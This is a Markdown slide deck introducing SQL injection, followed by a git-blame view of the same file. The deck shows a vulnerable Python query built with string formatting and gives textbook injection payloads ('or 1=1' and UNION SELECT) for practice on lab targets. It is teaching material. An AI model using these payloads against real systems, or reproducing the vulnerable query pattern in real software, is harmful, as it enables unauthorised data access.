presentations/introduction-to-sql-injection/sql_injection.md

% Introduction to SQL Injection
% Stefan Friese
% 11 April, 2024

---

# Topics

* How an SQL Injection is Created
* How to Exploit an SQL Injection
* SPOILER: How to Prevent an SQL Injection in the Next Presentation

---

## How Does it Happen

An SQL injection occurs when two things come together.

---

### Number 1

An SQL Query as a string embedded in other languages.

```sql
sql_query =
  cursor.execute(
    "SELECT * FROM users WHERE username = 'admin' \
    AND password = 's3cur3P4ssw0rd'"
  )
```

---

### Number 2

User input is possible as a part of said SQL query. Input is delimited, e.g. by
`'` characters.

```sql
sql_query =
  cursor.execute(
    "SELECT * FROM users WHERE username = '%s' AND password = '%s'" \
    % (username, password)
  )
```

---

## How to Exploit an SQLi Vulnerability

* Close the string through an ending quote
* Continue the query with your own SQL code

---

### Crafting an SQL Query

>```sql
>' or '1'='1' -- -
>```

* Close the existing string with: `'`
* Concatenate a second query: `or`
* Write a query that equals to True: `1=1`
* End the SQL query through a comment: `-- -`

---

### What Does the Query Look Like

```SQL
SELECT * FROM users WHERE username = '' or '1' = '1' -- - AND password '%s'
```
You can see thath the value of username has been closed by the `'` character.  
*Numbers as strings is an SQLite specific thing*

---

### Other Queries

```sql
' UNION SELECT 'a',NULL,NULL,NULL -- -
```

```sql
' UNION SELECT * FROM users WHERE user_id = 1 -- -
```

```sql
' UNION SELECT * FROM users WHERE user_id != 1337 -- -
```

---

## Even More Injection Queries

* [PayloadsAllTheThings](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/SQL%20Injection)
* [Hacktricks SQL Injection Page](https://book.hacktricks.xyz/pentesting-web/sql-injection)
* [SQLMap](https://github.com/sqlmapproject/sqlmap)

---

## Try for Yourself

* Use the provided [example](./example) inside this presentation's repository.
There is a [readme](./example/README.md) which guides you through the setup.

* Further, try [Damn Vulnerable Web
Application](https://github.com/digininja/DVWA) which you can setup by yourself
or use [Tryhackme's DVWA Room](https://tryhackme.com/r/room/dvwa).

---

# The End

<img src="./images/exploits_of_a_mom.png" alt="Convoluted Code" width="50%" height="auto%">
working on sqli intro 2024-04-11 15:41:37 +02:00			`% Introduction to SQL Injection`
			`% Stefan Friese`
			`% 11 April, 2024`

			`---`

			`# Topics`

			`* How an SQL Injection is Created`
			`* How to Exploit an SQL Injection`
			`* SPOILER: How to Prevent an SQL Injection in the Next Presentation`

			`---`

			`## How Does it Happen`

			`An SQL injection occurs when two things come together.`

			`---`

			`### Number 1`

theme change and typos 2024-04-18 15:56:25 +02:00			`An SQL Query as a string embedded in other languages.`
working on sqli intro 2024-04-11 15:41:37 +02:00
theme change and typos 2024-04-18 15:56:25 +02:00			```sql
working on sqli intro 2024-04-11 15:41:37 +02:00			`sql_query =`
			`cursor.execute(`
added some more information to the presentation, linting of code for the example implemenation 2024-04-16 15:11:51 +02:00			`"SELECT * FROM users WHERE username = 'admin' \`
			`AND password = 's3cur3P4ssw0rd'"`
working on sqli intro 2024-04-11 15:41:37 +02:00			`)`
			```

			`---`

			`### Number 2`

changes inside the presentation for better understandings of the topic 2024-05-06 17:22:43 +02:00			`User input is possible as a part of said SQL query. Input is delimited, e.g. by`
			`'` characters.
working on sqli intro 2024-04-11 15:41:37 +02:00
theme change and typos 2024-04-18 15:56:25 +02:00			```sql
working on sqli intro 2024-04-11 15:41:37 +02:00			`sql_query =`
			`cursor.execute(`
added some more information to the presentation, linting of code for the example implemenation 2024-04-16 15:11:51 +02:00			`"SELECT * FROM users WHERE username = '%s' AND password = '%s'" \`
working on sqli intro 2024-04-11 15:41:37 +02:00			`% (username, password)`
			`)`
			```

			`---`

theme change and typos 2024-04-18 15:56:25 +02:00			`## How to Exploit an SQLi Vulnerability`
working on sqli intro 2024-04-11 15:41:37 +02:00
worked on sql injection, added example page 2024-04-12 16:21:09 +02:00			`* Close the string through an ending quote`
			`* Continue the query with your own SQL code`

working on sqli intro 2024-04-11 15:41:37 +02:00			`---`

added some more information to the presentation, linting of code for the example implemenation 2024-04-16 15:11:51 +02:00			`### Crafting an SQL Query`

			>```sql
			`>' or '1'='1' -- -`
			>```

			* Close the existing string with: `'`
changes inside the presentation for better understandings of the topic 2024-05-06 17:22:43 +02:00			* Concatenate a second query: `or`
added some more information to the presentation, linting of code for the example implemenation 2024-04-16 15:11:51 +02:00			* Write a query that equals to True: `1=1`
			* End the SQL query through a comment: `-- -`

			`---`

			`### What Does the Query Look Like`

			```SQL
			`SELECT * FROM users WHERE username = '' or '1' = '1' -- - AND password '%s'`
			```
changes inside the presentation for better understandings of the topic 2024-05-06 17:22:43 +02:00			You can see thath the value of username has been closed by the `'` character.
added some more information to the presentation, linting of code for the example implemenation 2024-04-16 15:11:51 +02:00			`Numbers as strings is an SQLite specific thing`

			`---`

			`### Other Queries`

			```sql
			`' UNION SELECT 'a',NULL,NULL,NULL -- -`
theme change and typos 2024-04-18 15:56:25 +02:00			```

			```sql
added some more information to the presentation, linting of code for the example implemenation 2024-04-16 15:11:51 +02:00			`' UNION SELECT * FROM users WHERE user_id = 1 -- -`
theme change and typos 2024-04-18 15:56:25 +02:00			```

			```sql
added some more information to the presentation, linting of code for the example implemenation 2024-04-16 15:11:51 +02:00			`' UNION SELECT * FROM users WHERE user_id != 1337 -- -`
			```

			`---`

			`## Even More Injection Queries`

			`* [PayloadsAllTheThings](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/SQL%20Injection)`
			`* [Hacktricks SQL Injection Page](https://book.hacktricks.xyz/pentesting-web/sql-injection)`
			`* [SQLMap](https://github.com/sqlmapproject/sqlmap)`

			`---`

			`## Try for Yourself`

theme change and typos 2024-04-18 15:56:25 +02:00			`* Use the provided [example](./example) inside this presentation's repository.`
added some more information to the presentation, linting of code for the example implemenation 2024-04-16 15:11:51 +02:00			`There is a [readme](./example/README.md) which guides you through the setup.`

theme change and typos 2024-04-18 15:56:25 +02:00			`* Further, try [Damn Vulnerable Web`
			`Application](https://github.com/digininja/DVWA) which you can setup by yourself`
			`or use [Tryhackme's DVWA Room](https://tryhackme.com/r/room/dvwa).`

added some more information to the presentation, linting of code for the example implemenation 2024-04-16 15:11:51 +02:00			`---`

working on sqli intro 2024-04-11 15:41:37 +02:00			`# The End`
worked on sql injection, added example page 2024-04-12 16:21:09 +02:00
			`<img src="./images/exploits_of_a_mom.png" alt="Convoluted Code" width="50%" height="auto%">`